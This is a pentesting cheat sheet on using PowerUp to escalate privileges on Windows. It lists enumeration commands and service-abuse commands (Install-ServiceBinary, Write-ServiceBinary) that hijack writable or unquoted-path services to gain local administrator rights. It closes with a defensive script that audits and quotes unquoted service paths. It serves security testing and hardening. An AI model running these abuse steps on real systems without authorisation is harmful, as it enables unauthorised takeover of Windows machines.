# PowerUp

[PowerUp](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc) is a PowerShell tool used for privilege escalation on Windows systems. It helps identify misconfigurations and exploitable settings that allow users to elevate their privileges. It typically can be found at `/share/windows-resources/powersploit/Privesc/PowerUp.ps1`.

{% tabs %}
{% tab title="Service Cmds" %}
PowerShell commands for service interaction:

```powershell
# Service status
Get-Service -Name 'BackupMonitor'

# Start/Stop the service
Start-Service -Name "<ServiceName>"
Stop-Service -Name "<ServiceName>" -Force

# Restart the service
Restart-Service -Name 'BackupMonitor' -Force
```

{% endtab %}

{% tab title="AllChecks" %}

```powershell
Invoke-AllChecks
```

Show the help text and usage examples for a given abuse function, for instance:

```powershell
help invoke-serviceabuse -examples
```

[PrivescCheck](https://github.com/itm4n/PrivescCheck) and [winPEAS](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS) can also be used for full coverage:

```powershell
# PrivescCheck
Invoke-PrivEscCheck

# PEASS-ng
winPEASx64.exe -all
```

{% endtab %}

{% tab title="Binary Hijacking" %}
Enumerate potentially vulnerable services:

```powershell
# Services whose binary file (or the arguments passed to it) the current user can modify
Get-ModifiableServiceFile

# Services whose configuration (e.g. the binPath) the current user can modify
Get-ModifiableService

# Abuse one of the enumerated services
Install-ServiceBinary -Name 'mysql'

# Restart the service
Restart-Service -Name 'mysqld' -Force

# Confirm that it worked
net localgroup administrators
```

{% endtab %}

{% tab title="Unquoted Paths" %}
{% code overflow="wrap" %}

```powershell
# Services with unquoted binary paths that also contain a space (older and newer function names)
Get-ServiceUnquoted
Get-UnquotedService

# Abuse
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"

# Restart (ignore any errors)
Restart-Service GammaService

# Confirm
net localgroup administrators
```

{% endcode %}
{% endtab %}
{% endtabs %}
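As a defensive counterpart to the unquoted-path enumeration above, here is an added audit script (not part of PowerUp or of the original page) that lists services whose registry `ImagePath` is unquoted and contains a space, and can rewrite them with the executable path quoted. The function name and its `-Fix` switch are this example's own; it must run elevated to write the registry, and it skips entries that use environment variables or do not end in `.exe`.

```powershell
# Added example: audit (and optionally remediate) unquoted service ImagePath values.
# Assumes an elevated session when -Fix is used; -Fix is a switch defined only here.
function Get-UnquotedImagePath {
    [CmdletBinding()]
    param([switch]$Fix)

    $servicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($key in Get-ChildItem -Path $servicesKey -ErrorAction SilentlyContinue) {
        $props     = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
        $imagePath = $props.ImagePath
        if (-not $imagePath) { continue }

        # Already quoted, or no whitespace at all: nothing to do
        if ($imagePath.StartsWith('"') -or $imagePath -notmatch '\s') { continue }
        # Only absolute drive-letter paths; %SystemRoot%-style entries are skipped
        if ($imagePath -notmatch '^[A-Za-z]:\\') { continue }

        # Split the executable from its arguments at the first ".exe"
        $m = [regex]::Match($imagePath, '^(?<exe>.+?\.exe)(?<args>.*)$', 'IgnoreCase')
        if (-not $m.Success) { continue }
        $exe = $m.Groups['exe'].Value
        # A space only in the arguments does not create the ambiguity
        if ($exe -notmatch '\s') { continue }

        $fixed = '"' + $exe + '"' + $m.Groups['args'].Value
        [pscustomobject]@{
            Service   = $key.PSChildName
            ImagePath = $imagePath
            Fixed     = $fixed
        }
        if ($Fix) {
            # Rewrite the value with the executable path quoted
            Set-ItemProperty -Path $key.PSPath -Name ImagePath -Value $fixed
        }
    }
}

# Report only:
Get-UnquotedImagePath | Format-Table -AutoSize
# Remediate from an elevated session:
# Get-UnquotedImagePath -Fix
```

Review the report before using `-Fix`, since the quoted path is written back as-is and the service must be restarted for the change to take effect.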
